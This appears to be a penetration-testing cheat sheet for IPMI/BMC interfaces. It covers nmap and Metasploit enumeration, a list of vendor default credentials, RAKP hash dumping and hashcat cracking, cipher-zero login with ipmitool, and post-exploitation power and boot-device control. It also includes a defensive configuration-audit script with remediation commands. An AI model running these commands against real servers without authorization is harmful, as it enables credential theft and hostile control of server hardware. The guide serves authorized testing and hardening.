IPMI Pentesting Notes

Protocol Overview

Basic Information

  • Port: UDP 623

  • Protocol Type: Hardware management protocol

  • Purpose: Remote server management and monitoring

  • Security: Various authentication methods, often poorly configured

Key Components

  1. BMC (Baseboard Management Controller)

    • Embedded Linux system

    • Independent of host OS

    • Manages hardware directly

  2. Common Implementations

    • HP iLO (Integrated Lights Out)

    • Dell iDRAC

    • Supermicro IPMI

    • IBM IMM

Initial Enumeration

Port Scanning

# Basic UDP scan
sudo nmap -sU -p 623 <target>

# Version detection
sudo nmap -sU -p 623 -sV <target>

# IPMI-specific scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

Version Detection

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <target>
run

# Using nmap
sudo nmap -sU --script ipmi-version -p 623 <target>

# Using ipmitool
ipmitool -I lanplus -H <target> -p 623 chassis status

Default Credentials

Common Defaults

Vendor        Username        Password
Dell iDRAC    root            calvin
HP iLO        Administrator   <8-char random>
Supermicro    ADMIN           ADMIN
IBM IMM       USERID          PASSW0RD

Testing Default Access

# Using ipmitool
ipmitool -I lanplus -H <target> -U root -P calvin chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Password Attacks

Hash Dumping

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Using Python
mkdir output
python3 ipmipwner.py --host <target> --output ./output

Cracking Hashes

# IPMI v2.0 RAKP HMAC-SHA1 hashes
hashcat -m 7300 hashes.txt wordlist.txt

# Custom mask for HP iLO defaults (8 chars, uppercase + numbers)
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

# Using John
john --format=rakp hashes.txt

Common NSE Scripts

# Run all IPMI scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

# Important individual scripts
sudo nmap -sU -p 623 --script ipmi-version <target>      # Version detection
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>  # Cipher zero auth
sudo nmap -sU -p 623 --script ipmi-brute <target>        # Brute force

Exploitation Techniques

Cipher Zero Authentication

# Check for cipher zero
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>

# Exploit using ipmitool
ipmitool -I lanplus -H <target> -U '' -P '' -C 0 chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <target>
run
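
Cipher suite 0 is a BMC configuration setting, so the same weakness can be audited from a saved `ipmitool ... lan print <channel>` dump. The script below is an added example, not part of the original notes; it parses ipmitool's `lan print` layout and flags suite 0 being offered or enabled and the IPMI 1.5 NONE auth type being enabled. Both dumps in it are constructed samples.

```python
# Added example, not part of the original notes: audit a saved
# `ipmitool ... lan print <channel>` dump for the weaknesses these notes
# describe (cipher suite 0 offered/enabled, NONE auth type enabled).
# Both dumps below are constructed samples in ipmitool's output layout.
import re

WEAK_LAN_PRINT = """\
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : NONE MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     a=ADMIN
"""

# Same BMC after removing suite 0 and the NONE auth type for User.
HARDENED_LAN_PRINT = (WEAK_LAN_PRINT
    .replace("0,1,2,3", "1,2,3")
    .replace("aaaaXXaaaXXaaXX", "XaaaXXaaaXXaaXX")
    .replace(": User     : NONE ", ": User     : "))

def parse_auth_type_enable(text):
    """Map privilege level -> set of enabled auth types (one level per line)."""
    enabled = {}
    for line in text.splitlines():
        m = re.search(r":\s*(Callback|User|Operator|Admin|OEM)\s*:\s*(.*)$", line)
        if m:
            enabled[m.group(1)] = set(m.group(2).split())
    return enabled

def audit_lan_print(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    m = re.search(r"^RMCP\+ Cipher Suites\s*:\s*([\d,]+)", text, re.M)
    suites = [int(s) for s in m.group(1).split(",")] if m else []
    if 0 in suites:
        findings.append("cipher suite 0 is offered (no authentication, integrity or confidentiality)")
    # Cipher Suite Priv Max: character i is the max privilege for suite i, X = unused
    m = re.search(r"^Cipher Suite Priv Max\s*:\s*(\S+)", text, re.M)
    if m and m.group(1)[0] != "X":
        findings.append("cipher suite 0 is usable up to privilege code '%s'" % m.group(1)[0])
    for level, types in parse_auth_type_enable(text).items():
        if "NONE" in types:
            findings.append("auth type NONE enabled for %s privilege (IPMI 1.5)" % level)
    return findings

if __name__ == "__main__":
    print(audit_lan_print(WEAK_LAN_PRINT))
```

On most BMCs the matching remediation is `ipmitool lan set <channel> cipher_privs XaaaXXaaaXXaaXX` (suite 0 unused) and `ipmitool lan set <channel> auth <level> MD5,PASSWORD` per privilege level; the RAKP hash disclosure has no configuration fix and is addressed by network isolation and strong passwords.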

RAKP Authentication Bypass

# Dump RAKP hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Offline cracking
hashcat -m 7300 rakp.txt wordlist.txt

Post Exploitation

Information Gathering

# Get system info
ipmitool -I lanplus -H <target> -U username -P password fru print

# Get sensor data
ipmitool -I lanplus -H <target> -U username -P password sensor list

# Get user list
ipmitool -I lanplus -H <target> -U username -P password user list

System Control

# Power operations
ipmitool -I lanplus -H <target> -U username -P password chassis power status
ipmitool -I lanplus -H <target> -U username -P password chassis power reset

# Boot device control
ipmitool -I lanplus -H <target> -U username -P password chassis bootdev pxe

Common Vulnerabilities

  1. Authentication Issues:

    • Default credentials

    • Cipher Zero authentication

    • RAKP authentication bypass

    • Weak password policies

  2. Configuration Problems:

    • Exposed IPMI interfaces

    • Outdated firmware

    • Missing patches

    • Weak network restrictions

  3. Known CVEs:

    • CVE-2013-4786 (Cipher Zero)

    • CVE-2013-4787 (IPMI 2.0 RAKP Authentication)

    • Multiple HP iLO vulnerabilities

Response Codes and Messages

Code    Meaning
0x00    Success
0xC0    Node Busy
0xC1    Invalid Command
0xC3    Timeout
0xC4    Out of Space
0xC5    Invalid Data
0xFF    Unspecified Error

Best Practices for Pentesting

  1. Initial Reconnaissance:

    • Port discovery

    • Version detection

    • Default credential testing

    • Cipher support checking

  2. Deep Enumeration:

    • User enumeration

    • Hash dumping

    • Vulnerability scanning

    • Configuration analysis

  3. Documentation:

    • Version information

    • Found credentials

    • Vulnerable configurations

    • Successful exploits

  4. Risk Assessment:

    • Physical access implications

    • Network exposure

    • Credential security

    • Patch status

Common Tools Summary

  1. Enumeration:

    • nmap

    • ipmitool

    • Metasploit modules

    • Custom Python scripts

  2. Exploitation:

    • Metasploit

    • hashcat

    • John the Ripper

    • ipmitool

  3. Post-Exploitation:

    • ipmitool

    • IPMI management interfaces

    • Custom scripts

    • Web interfaces